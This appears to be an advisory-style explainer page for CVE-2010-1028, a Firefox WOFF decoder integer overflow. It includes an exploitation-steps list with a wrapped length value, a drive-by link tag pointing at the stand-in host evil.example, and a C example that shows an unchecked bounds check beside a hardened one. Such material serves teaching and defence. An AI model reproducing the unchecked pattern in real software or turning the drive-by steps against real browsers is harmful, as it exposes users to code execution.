firefox: integer overflow in the Web Open Fonts Format (WOFF) decoder of Mozilla Firefox leading to a buffer overflow (CVE-2010-1028) #shorts
Summary
Welcome to Security Spotlight. Today we’re unpacking CVE-2010-1028, a decade-old but educational vulnerability in Mozilla’s Web Open Fonts Format decoder that allowed remote code execution via a crafted WOFF file. We’ll cover how it works, the products affected, and the patches that finally put it to rest.
Product details
CVE-2010-1028 impacts the WOFF font decoder built into Mozilla Firefox 3.6 before 3.6.2 and 3.7 before 3.7 alpha 3. Beyond Firefox, font conversion libraries like sfnt2woff-zopfli in Linux distributions—Fedora 41 and 42 notably—also received security updates to mitigate any downstream risks.
Vulnerability type summary
This is an integer-overflow vulnerability that occurs during decompression of a WOFF container. The overflow leads to a buffer overflow, giving an attacker the ability to inject and execute arbitrary code on the victim’s machine.
Details of the vulnerability
At its core, the WOFF decoder miscalculates the size needed to decompress font data. An attacker crafts a malicious WOFF file that triggers an integer overflow, causing the decoder to allocate insufficient memory. When the decompression engine writes beyond the buffer boundary, it overwrites critical memory structures. Security researchers demonstrated exploitation using the VulnDisco 9.0 vd_ff module, achieving remote code execution in unpatched Firefox browsers.
Conclusion
While CVE-2010-1028 was addressed in 2010 with Firefox 3.6.2 and later releases, it highlights the lasting impact of integer-overflow bugs in multimedia parsers. Modern users should always run current browser versions and keep system libraries—like Fedora’s sfnt2woff-zopfli—up to date to guard against any lingering or related flaws.
Watch the full video on YouTube: CVE-2010-1028
Remediation and exploitation details
This chain involves the following actors
- Remote attacker: Initiator of the exploit
- Firefox user: Target of the exploit
The following systems are involved
- Mozilla Firefox 3.6 before 3.6.2 (Web browser): Vulnerable software
- Mozilla Firefox 3.7 before 3.7 alpha 3 (Web browser): Vulnerable software
Attack entry point
- WOFF decoder: Component that decompresses Web Open Font Format resources
- Crafted WOFF file: Font file manipulated to trigger integer overflow and buffer overflow
Remediation actions
Exploitation actions
Integer overflow during size calculation
- Set table length to 0xFFFFFFFF to force wrap-around
Drive-by download
- <link rel='stylesheet' href='http://evil.example/malicious.woff'>
Automatic font processing
- Opening the page in Firefox triggers background font loading
Integer overflow in decompression functionality
- Decompression call with wrapped size parameter
Heap-based buffer overflow
- Overflow of font data into adjacent memory
Arbitrary code execution
- Spawn a command shell or execute payload within the browser
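The "Details of the vulnerability" section and the "Integer overflow during size calculation" step above describe the same bug class: a 32-bit length taken from the WOFF table directory is added to an offset, the sum wraps around, and the decoder then allocates or bounds-checks against a value far smaller than the data it will write. The following added example is not Mozilla's decoder code; it is an illustration written for this page that places the unchecked arithmetic pattern beside a hardened version that rejects wrapped sizes. The struct layout follows the published WOFF 1.0 field order (44-byte header, 20-byte directory entries), but every function name and the sample directories are constructed for the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Sizes from the WOFF 1.0 layout: 44-byte header, 20-byte directory entries.
 * The decompressed output is an sfnt: 12-byte header, 16-byte entries. */
#define WOFF_HEADER_SIZE    44u
#define WOFF_DIR_ENTRY_SIZE 20u
#define SFNT_HEADER_SIZE    12u
#define SFNT_DIR_ENTRY_SIZE 16u

/* Illustrative directory entry (field order as in the WOFF 1.0 spec). */
typedef struct {
    uint32_t tag;
    uint32_t offset;        /* where the stored table starts in the file */
    uint32_t comp_length;   /* stored (possibly compressed) length */
    uint32_t orig_length;   /* length after decompression */
    uint32_t orig_checksum;
} woff_dir_entry;

/* Vulnerable pattern: the sum is computed in 32 bits. A length such as
 * 0xFFFFFFFF wraps to a small value, passes the comparison, and a later
 * read or decompression runs past the end of the input buffer. */
bool table_in_bounds_unchecked(uint32_t offset, uint32_t length, uint32_t file_len) {
    return offset + length <= file_len;
}

/* Hardened pattern: compare against the remaining space instead of adding,
 * so no intermediate result can overflow. */
bool table_in_bounds_checked(uint32_t offset, uint32_t length, uint32_t file_len) {
    if (offset > file_len) return false;
    return length <= file_len - offset;
}

/* Overflow-checked 32-bit addition; returns false instead of wrapping. */
bool add_u32_checked(uint32_t a, uint32_t b, uint32_t *out) {
    if (a > UINT32_MAX - b) return false;
    *out = a + b;
    return true;
}

/* Round a table length up to the 4-byte boundary sfnt tables are padded to.
 * Even this step can wrap for lengths near UINT32_MAX, so it is checked too. */
bool pad4_checked(uint32_t len, uint32_t *out) {
    if (len > UINT32_MAX - 3u) return false;
    *out = (len + 3u) & ~3u;
    return true;
}

/* Validate a parsed directory before allocating the decompressed buffer.
 * Returns false on any bounds or size-arithmetic failure; on success
 * *sfnt_size holds the total decompressed size that is safe to allocate. */
bool validate_directory(const woff_dir_entry *dir, uint32_t num_tables,
                        uint32_t file_len, uint32_t *sfnt_size) {
    uint32_t dir_bytes, total;

    /* The header and directory themselves must fit inside the file. */
    if (num_tables > (UINT32_MAX - WOFF_HEADER_SIZE) / WOFF_DIR_ENTRY_SIZE) return false;
    dir_bytes = WOFF_HEADER_SIZE + num_tables * WOFF_DIR_ENTRY_SIZE;
    if (dir_bytes > file_len) return false;

    /* Start from the sfnt header and directory, then add each padded table. */
    if (num_tables > (UINT32_MAX - SFNT_HEADER_SIZE) / SFNT_DIR_ENTRY_SIZE) return false;
    total = SFNT_HEADER_SIZE + num_tables * SFNT_DIR_ENTRY_SIZE;

    for (uint32_t i = 0; i < num_tables; i++) {
        uint32_t padded;
        if (dir[i].offset < dir_bytes) return false; /* overlaps header/directory */
        if (!table_in_bounds_checked(dir[i].offset, dir[i].comp_length, file_len)) return false;
        if (!pad4_checked(dir[i].orig_length, &padded)) return false;
        if (!add_u32_checked(total, padded, &total)) return false;
    }
    *sfnt_size = total;
    return true;
}

/* Constructed sample directories for the demo (not from any real font). */
static const woff_dir_entry benign_dir[2] = {
    {0x68656164u /* 'head' */, 84,  54,  54, 0},
    {0x676c7966u /* 'glyf' */, 140, 300, 900, 0},
};
static const woff_dir_entry hostile_dir[1] = {
    {0x676c7966u /* 'glyf' */, 64, 0xFFFFFFFFu, 0xFFFFFFFFu, 0},
};

/* Two tables that genuinely fit in a 512-byte file: accepted, sfnt size 1000. */
bool demo_benign_accepted(uint32_t *sfnt_size) {
    return validate_directory(benign_dir, 2, 512, sfnt_size);
}

/* A length of 0xFFFFFFFF wraps the naive check but is rejected by the hardened one. */
bool demo_hostile_rejected(void) {
    uint32_t sfnt_size;
    return !validate_directory(hostile_dir, 1, 512, &sfnt_size);
}

int main(void) {
    uint32_t size = 0;
    printf("naive check accepts wrapped length: %s\n",
           table_in_bounds_unchecked(64, 0xFFFFFFFFu, 512) ? "yes" : "no");
    printf("benign directory accepted: %s (sfnt size %u)\n",
           demo_benign_accepted(&size) ? "yes" : "no", size);
    printf("hostile directory rejected: %s\n", demo_hostile_rejected() ? "yes" : "no");
    return 0;
}
```

The design choice worth noting is that every size the decoder derives from attacker-controlled fields (offset plus length, the 4-byte padding, the running total) goes through a check that fails closed rather than through plain arithmetic; in unsigned C the wrap itself is well defined, which is exactly why it goes unnoticed without such checks. Compile with `cc -std=c99 -Wall` and run it to see the naive check accept the wrapped length that the hardened directory validation refuses.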
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://bugzilla.mozilla.org/show_bug.cgi?id=552216
- https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/
- http://blog.mozilla.com/security/2010/02/22/secunia-advisory-sa38608/
- http://www.h-online.com/security/news/item/Zero-day-exploit-for-Firefox-3-6-936124.html
- http://blog.psi2.de/en/2010/02/20/going-commercial-with-firefox-vulnerabilities/
- http://secunia.com/advisories/38608
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7969
- http://blog.mozilla.com/security/2010/03/18/update-on-secunia-advisory-sa38608/
- http://www.mozilla.org/security/announce/2010/mfsa2010-08.html
- http://www.kb.cert.org/vuls/id/964549
- http://secunia.com/community/forum/thread/show/3592
- [2025-05-20] Fedora 42 release includes a security fix for CVE-2010-1028 and other security-relevant bugs.
- [2025-05-20] Fedora 41 releases security fix for CVE-2010-1028 and other bugs.
- [2025-05-20] Fedora 42 releases sfnt2woff-zopfli 2025-314065 with security fixes for CVE-2010-1028 and other bugs.
- [2025-05-20] Fedora 41 releases sfnt2woff-zopfli 2025-a2a56326b3 with a security fix for CVE-2010-1028 and other bugs.